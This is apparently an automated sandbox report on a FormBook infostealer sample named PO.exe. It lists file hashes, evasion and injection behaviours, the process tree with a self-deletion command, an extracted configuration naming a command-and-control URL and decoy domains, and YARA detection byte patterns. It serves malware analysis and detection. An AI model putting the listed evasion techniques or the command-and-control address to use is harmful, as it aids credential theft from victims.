Play interactive tour

Edit tour

Analysis Report PO.exe

Overview

General Information

Sample Name:	PO.exe
Analysis ID:	383905
MD5:	665cb19601850467af3ee7d9fd0e0350
SHA1:	8ac40ef9fa5100a39b14258d8d8e562cefd7202c
SHA256:	f3147300f9248e07ffd3a1b7131bed4febad8b0a88eeda27e606f36d04ff1340
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Contains functionality to prevent local Windows debugging

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

PO.exe (PID: 5584 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 665CB19601850467AF3EE7D9FD0E0350)

PO.exe (PID: 5536 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 665CB19601850467AF3EE7D9FD0E0350)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 3980 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

cmd.exe (PID: 1320 cmdline: /c del 'C:\Users\user\Desktop\PO.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.c-voyageinc.com/r4ei/"], "decoy": ["8clintonstreet.com", "sherylhotpepperblends.com", "eucham.asia", "earnestqueen.com", "vstexchange.com", "theoutofbounds.com", "allincursive.com", "getgenevieved.com", "commonlawpeoplesassembly.net", "brideclubstorerastreamento.com", "cngelectricaldesign.com", "mizmaleather.com", "nicolabenge.com", "babyboxbuy.com", "xaydungquan9.com", "hclifechurch.com", "cwyxonlp.icu", "inocentkidd.com", "worldhw.com", "soul.exchange", "garshbedmi.info", "hayratindonesia.com", "optimummedical-uk.com", "jagocopywriter.com", "loandong.com", "tnacharters.com", "rdj-cpa.com", "nklwmb.com", "baykusbaskimerkezi.xyz", "websiteworlda-z.com", "gulumsekoop.xyz", "artforthebayarea.com", "hkafrfudl.icu", "thekhufureign.com", "stanfordcodingtutor.com", "puoynios.website", "saearners.info", "epipdfhany.com", "cowboycooloutfitters.net", "therealrefinery.com", "royal-english-academy.com", "dante.report", "montonvuraeditted.space", "webuytampabayhouses.com", "phorice.com", "juxrams.info", "francisboyrd.com", "edifice-base.com", "shjzly.com", "frisdrank.deals", "cannajointn.com", "dianshi.ink", "droneserviceshouston.com", "swaymontoya.com", "omvvv.com", "yourherogarden.net", "areenaarora.com", "complex-kokukenzyo.com", "minyakgelici.com", "municipiodeanton.net", "opimexico.com", "xgame.online", "squrl.network", "bayleafdenver.info"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.PO.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.PO.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.PO.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
1.2.PO.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.PO.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.PO.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
1.1.PO.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.PO.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.PO.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0.2.PO.exe.2670000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PO.exe.2670000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PO.exe.2670000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
0.2.PO.exe.2670000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PO.exe.2670000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PO.exe.2670000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
1.1.PO.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.PO.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.PO.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.c-voyageinc.com/r4ei/"], "decoy": ["8clintonstreet.com", "sherylhotpepperblends.com", "eucham.asia", "earnestqueen.com", "vstexchange.com", "theoutofbounds.com", "allincursive.com", "getgenevieved.com", "commonlawpeoplesassembly.net", "brideclubstorerastreamento.com", "cngelectricaldesign.com", "mizmaleather.com", "nicolabenge.com", "babyboxbuy.com", "xaydungquan9.com", "hclifechurch.com", "cwyxonlp.icu", "inocentkidd.com", "worldhw.com", "soul.exchange", "garshbedmi.info", "hayratindonesia.com", "optimummedical-uk.com", "jagocopywriter.com", "loandong.com", "tnacharters.com", "rdj-cpa.com", "nklwmb.com", "baykusbaskimerkezi.xyz", "websiteworlda-z.com", "gulumsekoop.xyz", "artforthebayarea.com", "hkafrfudl.icu", "thekhufureign.com", "stanfordcodingtutor.com", "puoynios.website", "saearners.info", "epipdfhany.com", "cowboycooloutfitters.net", "therealrefinery.com", "royal-english-academy.com", "dante.report", "montonvuraeditted.space", "webuytampabayhouses.com", "phorice.com", "juxrams.info", "francisboyrd.com", "edifice-base.com", "shjzly.com", "frisdrank.deals", "cannajointn.com", "dianshi.ink", "droneserviceshouston.com", "swaymontoya.com", "omvvv.com", "yourherogarden.net", "areenaarora.com", "complex-kokukenzyo.com", "minyakgelici.com", "municipiodeanton.net", "opimexico.com", "xgame.online", "squrl.network", "bayleafdenver.info"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll

ReversingLabs: Detection: 10%

Multi AV Scanner detection for submitted file

Show sources

Source: PO.exe

ReversingLabs: Detection: 16%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

Source: 10.2.explorer.exe.51af834.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.PO.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.PO.exe.2670000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.PO.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: PO.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

